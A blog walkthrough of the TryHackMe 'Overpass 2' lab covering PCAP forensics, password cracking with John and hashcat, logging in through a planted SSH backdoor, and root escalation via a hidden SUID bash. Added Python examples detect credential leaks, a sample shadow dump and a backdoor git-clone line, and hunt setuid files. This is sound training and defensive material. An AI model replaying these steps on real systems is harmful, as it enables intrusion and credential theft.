Overpass 2 — Hacked: TryHackMe Walkthrough

Damon Taylor
6 min read · Dec 13, 2022


Introduction

Hey everyone, I’m back again to showcase another great learning experience over at TryHackMe. This room really shows how to analyze a PCAP file, and it highlights the problem of passing credentials over outdated, unencrypted protocols, which is exactly what shows up in the capture. We are able to go into the PCAP and watch the attacker doing malicious things to the webserver, and we are able to take advantage of the credentials they exposed. Using a few tools, we log into the machine ourselves through the attacker’s backdoor. Lastly, this room highlights elevating privileges on an account so that we can access items we normally wouldn’t be able to.

Forensics — Analyze the PCAP (Part 1)

1.1 What was the URL of the page they used to upload a reverse shell?

Our first step of recon is to analyze the PCAP with some sort of tool. I first used a free online PCAP analyzer called A-Packets. With this tool I was able to find the URL within one of the POST requests.

1.2 What payload did the attacker use to gain access?

Within the same POST request I was able to find more information and eventually found the payload the attacker used to gain access to our machine.

1.3 What password did the attacker use to privesc?

At this point I had used up everything the online PCAP analyzer could give me and had to do some manual digging. I decided to continue the rest of the recon in Wireshark. Within Wireshark I searched for the string ‘password’ within all of the packet bytes, and I was finally able to find something in packet #98.

1.4 How did the attacker establish persistence?

Our attacker wants to keep their foothold on our system, so they would most likely install some sort of software. After digging within the same packet I was able to find something very interesting… a backdoor!

Our attacker downloaded a backdoor from GitHub, which can be used to SSH into the machine (we will show how this is used later :)

1.5 Using the fasttrack wordlist, how many of the system passwords were crackable?

Also within this packet there was a shadow file holding the users along with their hashed credentials. We want to find out how many of these user passwords can be cracked, so I figured it would be a great opportunity to utilize John the Ripper.

First we take all of the shadow entries at hand and save them into a text file (I named mine Password). Then we use John to crack the hashes with the fasttrack wordlist. I was able to find 4 users whose passwords could easily be cracked (easy money).
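The manual Wireshark string search from 1.3 to 1.5 can be automated once the cleartext stream is exported. This is an added example, not code from the original post: it scans a constructed stand-in for the session in packet #98 for a credential typed in the clear, a backdoor fetched from GitHub, and /etc/shadow lines that can be saved to the text file John reads.

```python
"""Scan a reconstructed plaintext stream for the indicators found by hand
in packet #98. Added example; SAMPLE_STREAM is constructed, not real data."""
import re

# Constructed stand-in for the cleartext session (hashes are placeholders).
SAMPLE_STREAM = """\
www-data@overpass:/var/www/html$ su james
Password: example-pass
james@overpass:~$ sudo cat /etc/shadow
root:$6$saltsalt$constructedhashvalue0000000000000000000000000000:18400:0:99999:7:::
james:$6$saltsalt$constructedhashvalue1111111111111111111111111111:18400:0:99999:7:::
james@overpass:~$ git clone https://github.com/example-org/ssh-backdoor.git
"""

# user:$id$salt$hash:lastchange:... as found in /etc/shadow
SHADOW_RE = re.compile(r"^\w+:\$[0-9a-z]+\$[^:]*:\d*:.*$", re.M)
RULES = [
    ("cleartext credential", re.compile(r"^Password:\s*\S+", re.M)),
    ("github fetch", re.compile(r"\b(?:git clone|wget|curl)\s+\S*github\.com\S*", re.M)),
    ("shadow file dump", SHADOW_RE),
]

def scan_stream(text):
    """Return {rule name: hit count} for every rule that matched at least once."""
    hits = {}
    for name, pattern in RULES:
        count = len(pattern.findall(text))
        if count:
            hits[name] = count
    return hits

def extract_shadow_lines(text):
    """Pull out the user:hash lines in the format John expects, one per line."""
    return SHADOW_RE.findall(text)
```

Write the output of `extract_shadow_lines` to a file and pass that file to John with the fasttrack wordlist, as described above.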

Research — Analyze the code (Part 2)

2.1 What’s the default hash for the backdoor?

For this next part we want to download the backdoor ourselves and check it out. After downloading it, I ran the binary with its help option to see if it would give us any specific details on the backdoor. I was able to find the default hash this way.

2.2 What’s the hardcoded salt for the backdoor?

In order to find the hardcoded salt we have to analyze the source code, which we can do right on the GitHub website. The piece we are specifically looking for is in the main.go file.

2.3 What was the hash that the attacker used?

Now we have to go back to the PCAP. Using Wireshark (within that same packet from earlier) I was able to find the hash the attacker used.

2.4 Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

For this next step we want to create another text file containing the hash and the hardcoded salt in the following format — Hash:Salt. After this we use the tool hashcat along with the ‘rockyou’ wordlist in order to crack this hash.

After running the command I was able to crack the hash!
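Why the hardcoded salt from 2.2 makes the hash:salt crack in 2.4 cheap, shown beside a hardened check. This is an added example and not the backdoor's own code; it assumes the backdoor verifies a single SHA-512 over password + fixed salt (the scheme the Hash:Salt format corresponds to), and the salt and wordlist below are constructed.

```python
"""Weak fixed-salt hashing versus a per-user salted, iterated check.
Added example; FIXED_SALT and SMALL_WORDLIST are constructed stand-ins."""
import hashlib
import hmac
import os

FIXED_SALT = "constructed-fixed-salt"     # stands in for the hardcoded salt
SMALL_WORDLIST = ["letmein", "password1", "trustno1", "summer2022"]
ROUNDS = 100_000

def weak_hash(password, salt=FIXED_SALT):
    """Assumed backdoor scheme: one SHA-512 over password+salt, same salt for everyone."""
    return hashlib.sha512((password + salt).encode()).hexdigest()

def wordlist_check(target_hash, salt, wordlist):
    """The work a Hash:Salt wordlist run does: one fast SHA-512 per candidate."""
    for word in wordlist:
        if weak_hash(word, salt) == target_hash:
            return word
    return None

def strong_hash(password, salt=None, rounds=ROUNDS):
    """Hardened: random per-user salt plus PBKDF2-HMAC-SHA512, stored as salt:digest."""
    salt = salt or os.urandom(16).hex()
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt.encode(), rounds)
    return f"{salt}:{digest.hex()}"

def strong_verify(password, stored, rounds=ROUNDS):
    """Recompute with the stored salt and compare in constant time."""
    salt, _ = stored.split(":", 1)
    return hmac.compare_digest(strong_hash(password, salt, rounds), stored)
```

With the hardened form every user gets a different salt, so a single wordlist run no longer covers every account, and each candidate costs ROUNDS iterations instead of one hash.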

Attack — Get back in! (Part 3)

3.1 The attacker defaced the website. What message did they leave as a heading?

This was an easy one. We just have to visit the website itself and it shows us the message our attacker left.

3.3 What’s the user flag?

Now it’s time to put ourselves in the shoes of the attacker. We already know there is a backdoor on the machine and we know the cracked password. Time to get hackin’! Our first step is to SSH into the machine on port 2222 (our attacker selected this port, as seen in the PCAP).

After a successful login I went up one directory (back to /home/james) and was able to find the user flag.

3.4 What’s the root flag?

This was the hardest part, but we get to learn more about escalating privileges. I first tried going into root directly but was unsuccessful (aw, c’mon). With that being said, I decided to do more digging. I went back to the original directory I landed in and listed everything in it, including hidden files.

I was able to find a SUID bash binary (.suid_bash). I checked the permissions on that file and guess who owns it (yes, it’s owned by root). After running ./.suid_bash -p I was able to run the shell as root. I was then able to go to the root directory, where I found the root flag!
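A hidden setuid copy of bash is exactly the kind of persistence a defender should hunt for. This is an added example, not part of the original post: it walks a directory tree and reports regular files with the setuid bit whose owner matches owner_uid (0 for root in a real audit); the demo fixture uses the current user's uid so it can run unprivileged.

```python
"""Hunt for setuid files such as the hidden .suid_bash found above.
Added example; the demo fixture is constructed in a temporary directory."""
import os
import stat
import tempfile

def find_setuid(root_dir, owner_uid=0):
    """Return sorted paths under root_dir that are regular files, carry the
    setuid bit, and are owned by owner_uid (root = 0 on a real system)."""
    found = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable entry, keep walking
            is_suid = bool(st.st_mode & stat.S_ISUID)
            if stat.S_ISREG(st.st_mode) and is_suid and st.st_uid == owner_uid:
                found.append(path)
    return sorted(found)

def demo():
    """Constructed fixture: a hidden setuid file beside an ordinary one."""
    with tempfile.TemporaryDirectory() as d:
        suid = os.path.join(d, ".suid_bash")
        plain = os.path.join(d, "notes.txt")
        for p in (suid, plain):
            with open(p, "w") as f:
                f.write("x")
        os.chmod(suid, 0o4755)               # set the setuid bit on one file
        return [os.path.basename(p) for p in find_setuid(d, os.getuid())]

if __name__ == "__main__":
    print(demo())
```

On a real host, run `find_setuid("/")` as root and compare the result with the distribution's expected setuid set; a setuid bash under a user's home directory should never appear there.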

Final Thoughts

This was a great room for learning how to analyze PCAP files and for practicing privilege escalation techniques. Overall it was a great experience and I will be back soon with another blog! Thanks for reading :)
